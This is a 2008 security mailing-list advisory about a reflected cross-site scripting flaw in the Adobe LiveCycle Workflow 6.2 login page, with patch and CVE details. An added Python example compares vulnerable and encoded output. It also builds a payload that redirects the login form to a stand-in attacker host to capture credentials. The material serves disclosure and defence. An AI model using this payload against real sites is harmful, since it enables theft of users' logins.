[NT] Adobe LiveCycle Workflow XSS Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 12 Mar 2008 13:56:24 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Adobe LiveCycle Workflow XSS Vulnerability
------------------------------------------------------------------------
SUMMARY
The login page of the Adobe LiveCycle Workflow management web interface is
vulnerable to cross-site scripting (XSS).
DETAILS
Vulnerable Systems:
* Adobe LiveCycle Workflow version 6.2 Management Web Interface
Impact:
A remote attacker could use the XSS to deliver arbitrary HTML and script to a
user of the login page and capture the username and password that user enters.
Technical Details:
Input passed in the URL of the web management login page is not properly
sanitized before being reflected back to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of the affected site.
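The following is an added example (not code from the advisory or from Adobe) that shows the bug class described above in miniature: a login page that reflects a URL parameter into its HTML unencoded, the same page with output encoding applied, and the check a tester would run to tell the two apart. The parameter name `msg`, the page layout, the host and path, and the collector URL in the payload are all assumptions; the advisory names none of them.

```python
"""Reflected XSS in a login page: vulnerable vs. encoded output, plus a probe check."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed page layout and parameter name ("msg"); the advisory names neither.
LOGIN_TEMPLATE = """<html><body>
<form method="post" action="/login">
<p class="notice">{notice}</p>
<input name="username"><input name="password" type="password">
<input type="submit" value="Log in">
</form></body></html>"""

# Constructed attacker payload: closes the <p> element and injects a script
# that repoints the login form at a collector, so submitted credentials
# leave the site. The collector host is hypothetical.
PROBE = '</p><script>document.forms[0].action="http://attacker.example/c"</script>'


def attack_url(base_url: str, payload: str = PROBE) -> str:
    """Build the link an attacker would send; urlencode percent-encodes the payload."""
    return base_url + "?" + urlencode({"msg": payload})


def notice_from_url(url: str) -> str:
    """Server side: pull the 'msg' parameter out of the request URL, percent-decoded."""
    return parse_qs(urlsplit(url).query).get("msg", [""])[0]


def render_login_vulnerable(url: str) -> str:
    """The bug class from the advisory: URL input reflected into HTML unencoded."""
    return LOGIN_TEMPLATE.format(notice=notice_from_url(url))


def render_login_fixed(url: str) -> str:
    """The fix: HTML-encode the value for the element-content context before output."""
    return LOGIN_TEMPLATE.format(notice=html.escape(notice_from_url(url), quote=True))


def reflects_unencoded(page: str, payload: str = PROBE) -> bool:
    """Tester's check: does the payload come back with its metacharacters intact?"""
    return payload in page


if __name__ == "__main__":
    url = attack_url("http://livecycle.example/workflow/login")  # hypothetical host/path
    print("vulnerable page reflects payload:", reflects_unencoded(render_login_vulnerable(url)))
    print("fixed page reflects payload:     ", reflects_unencoded(render_login_fixed(url)))
```

`html.escape` is the right encoder only because the value lands in element content; a value reflected inside an attribute, a `<script>` block or a URL needs the encoding for that context instead, and the probe check above is the quick way to confirm which contexts a given parameter reaches.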
Fix Information:
This issue has been resolved. The patch may be obtained from:
http://www.adobe.com/go/supportportal
CVE Information:
CVE-2008-1202
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1202
ADDITIONAL INFORMATION
The information has been provided by Dave Lewis <disclosure@xxxxxxxxxxxxxxxx>.
The original article can be found at:
http://www.liquidmatrix.org/blog/2008/03/11/advisory-adobe-livecycle-workflow-xss-vulnerability/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.